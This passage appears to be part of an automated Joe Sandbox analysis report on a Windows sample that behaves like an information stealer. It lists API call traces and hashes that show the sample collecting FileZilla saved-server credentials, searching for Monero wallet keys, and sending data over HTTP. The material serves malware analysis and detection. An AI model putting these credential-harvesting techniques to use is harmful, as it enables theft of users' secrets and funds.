                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                              • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E015B8,00E00D96), ref: 00DEF71E
                              • StrCmpCA.SHLWAPI(?,00E015BC), ref: 00DEF76F
                              • StrCmpCA.SHLWAPI(?,00E015C0), ref: 00DEF785
                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00DEFAB1
                              • FindClose.KERNEL32(000000FF), ref: 00DEFAC3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                              • String ID:
                              • API String ID: 3334442632-0
                              • Opcode ID: 860767f2abb459de7818cbe3f2a18e9fac0d069851562fc3e7ad68480e638212
                              • Instruction ID: fc7b7341aa6ecb4d20b72bd98074281e275ef6ee9ea65ca63af27af9697cdc9f
                              • Opcode Fuzzy Hash: 860767f2abb459de7818cbe3f2a18e9fac0d069851562fc3e7ad68480e638212
                              • Instruction Fuzzy Hash: 7E11A5B180015D9BDB24FB64DC559FD7378EF10300F45C2A5A60E56092EF702B4ACBB2
                              Function 010E599E Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: F.+?
                              • API String ID: 0-1845388099
                              • Opcode ID: 127d27253f4af84b10e221d8baa9bb0b5973b016d6662cdbb6d76b1b2a0e535a
                              • Instruction ID: 3c0fb8ca70863e8026148b298e00caf2a619692569a75a084f255617909a178f
                              • Opcode Fuzzy Hash: 127d27253f4af84b10e221d8baa9bb0b5973b016d6662cdbb6d76b1b2a0e535a
                              • Instruction Fuzzy Hash: B34125F3E587049FF3086E29ECC937AF785EB94320F1A453DDA8453784EAB95C058286
                              Function 010D15D6 Relevance: .2, Instructions: 167COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c1eed39303ea54d4e7f2a0e483fc1b5a044f71b7d5335accfed52cfbe5ca82c2
                              • Instruction ID: ceac41805c27be8f310418cef043f470d2b91be79a627c51b1f55dbd535dce19
                              • Opcode Fuzzy Hash: c1eed39303ea54d4e7f2a0e483fc1b5a044f71b7d5335accfed52cfbe5ca82c2
                              • Instruction Fuzzy Hash: 1F41A9F3A186044BE30C6A3CDC65736B6D6DFD4310F2A863EEA82D37C4E8794D014286
                              Function 010C28F2 Relevance: .2, Instructions: 165COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8507aed6d8964df2e58356903b5ee615c947d8d6c07e216d1ea83eb880c6c15d
                              • Instruction ID: 971865245b4842a892a0ab1cd46dbdb6b4953ca96796ee4eca5fb93ae99e58e1
                              • Opcode Fuzzy Hash: 8507aed6d8964df2e58356903b5ee615c947d8d6c07e216d1ea83eb880c6c15d
                              • Instruction Fuzzy Hash: BD51BAF7A492049FD3005E7CED8536AB7C9ABE4220F2F4A3CD7C4C7785E63559058682
                              Function 01241F39 Relevance: .1, Instructions: 134COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 53d2aa1d0eb7c0aec7d64848899b613a1f08b093d2d30ce8c885263b9e593c10
                              • Instruction ID: 23298aac7b8068fed4e2f8997139df68200a6b635fd188f6c52ffeaddcdc721b
                              • Opcode Fuzzy Hash: 53d2aa1d0eb7c0aec7d64848899b613a1f08b093d2d30ce8c885263b9e593c10
                              • Instruction Fuzzy Hash: DF4176F355870C9FE304AF69ECC167BF7E8EB94660F05463EE181C3B00EA7558088A82
                              Function 010A43DD Relevance: .1, Instructions: 113COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a2f7277f8778696c264a50a7311c82686abe6874b2e7a073fb0cd92caf6d144b
                              • Instruction ID: 4ddc720a8a9733d56640f8a8f5f26aef1f4c70a006bf59d88c054e7f7dc46d93
                              • Opcode Fuzzy Hash: a2f7277f8778696c264a50a7311c82686abe6874b2e7a073fb0cd92caf6d144b
                              • Instruction Fuzzy Hash: 943107B3F042140BF7449D3ADD483667AD39BC4320F2AC63C9A589BBC8EC3E9C064285
                              Function 00DF9750 Relevance: .0, Instructions: 15COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                              • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                              • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                              Function 00DF0250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                                • Part of subcall function 00DF8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00DF8E0B
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DE99EC
                                • Part of subcall function 00DE99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00DE9A11
                                • Part of subcall function 00DE99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00DE9A31
                                • Part of subcall function 00DE99C0: ReadFile.KERNEL32(000000FF,?,00000000,00DE148F,00000000), ref: 00DE9A5A
                                • Part of subcall function 00DE99C0: LocalFree.KERNEL32(00DE148F), ref: 00DE9A90
                                • Part of subcall function 00DE99C0: CloseHandle.KERNEL32(000000FF), ref: 00DE9A9A
                                • Part of subcall function 00DF8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00DF8E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00E00DBA,00E00DB7,00E00DB6,00E00DB3), ref: 00DF0362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DF0369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00DF0385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 00DF03CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF03DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00DF0419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00DF0463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF0532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00DF0562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00DF0571
                              • lstrcat.KERNEL32(?,url: ), ref: 00DF0580
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF0593
                              • lstrcat.KERNEL32(?,00E01678), ref: 00DF05A2
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF05B5
                              • lstrcat.KERNEL32(?,00E0167C), ref: 00DF05C4
                              • lstrcat.KERNEL32(?,login: ), ref: 00DF05D3
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF05E6
                              • lstrcat.KERNEL32(?,00E01688), ref: 00DF05F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00DF0604
                              • lstrcat.KERNEL32(?,00000000), ref: 00DF0617
                              • lstrcat.KERNEL32(?,00E01698), ref: 00DF0626
                              • lstrcat.KERNEL32(?,00E0169C), ref: 00DF0635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E00DB2), ref: 00DF068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              • Opcode ID: 000719ebe0a1f7e727fd29ce167a5c4c59ab484d715b1d4961d118d3cde1095a
                              • Instruction ID: a1ea7d7980c2e77a3b608c89a0566d4e0f866e64624f2b24f40514d1cf64751e
                              • Opcode Fuzzy Hash: 000719ebe0a1f7e727fd29ce167a5c4c59ab484d715b1d4961d118d3cde1095a
                              • Instruction Fuzzy Hash: B9D11BB1900208ABCB14EBE4DD96EFEB778EF14300F558418F606B7085DE75AA4ACB71
                              Function 00DE5960 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00DFA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00DFA7E6
                                • Part of subcall function 00DE47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00DE4839
                                • Part of subcall function 00DE47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00DE4849
                                • Part of subcall function 00DFA740: lstrcpy.KERNEL32(00E00E17,00000000), ref: 00DFA788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00DE59F8
                              • StrCmpCA.SHLWAPI(?,0197F1D8), ref: 00DE5A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00DE5B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0197F1A8,00000000,?,01979E38,00000000,?,00E01A1C), ref: 00DE5E71
                              • lstrlen.KERNEL32(00000000), ref: 00DE5E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00DE5E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00DE5E9A
                              • lstrlen.KERNEL32(00000000), ref: 00DE5EAF
                              • lstrlen.KERNEL32(00000000), ref: 00DE5ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00DE5EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00DE5F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00DE5F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00DE5F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FBD
                              • HttpOpenRequestA.WININET(00000000,0197F148,?,0197E7B8,00000000,00000000,00400100,00000000), ref: 00DE5BF8
                                • Part of subcall function 00DFA9B0: lstrlen.KERNEL32(?,019786B0,?,\Monero\wallet.keys,00E00E17), ref: 00DFA9C5
                                • Part of subcall function 00DFA9B0: lstrcpy.KERNEL32(00000000), ref: 00DFAA04
                                • Part of subcall function 00DFA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00DFAA12
                                • Part of subcall function 00DFA8A0: lstrcpy.KERNEL32(?,00E00E17), ref: 00DFA905
                                • Part of subcall function 00DFA920: lstrcpy.KERNEL32(00000000,?), ref: 00DFA972
                                • Part of subcall function 00DFA920: lstrcat.KERNEL32(00000000), ref: 00DFA982
                              • InternetCloseHandle.WININET(00000000), ref: 00DE5FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2203803568.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                              • Associated: 00000000.00000002.2203767107.0000000000DE0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000E9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.0000000000EC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2203803568.000000000102A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.000000000103E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000011D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205335514.00000000012F9000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205666867.00000000012FA000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205787567.00000000014A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2205806938.00000000014A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_de0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              • Opcode ID: 7c8c9e81f869676f7e0567cec837b83b2ff0838cd9dc24321943d97c95a1b2f8
                              • Instruction ID: 91ffffb41133831c9727c34fa49c0c9283318a3b8e000917c6055357f551e171
                              • Opcode Fuzzy Hash: 7c8c9e81f869676f7e0567cec837b83b2ff0838cd9dc24321943d97c95a1b2f8
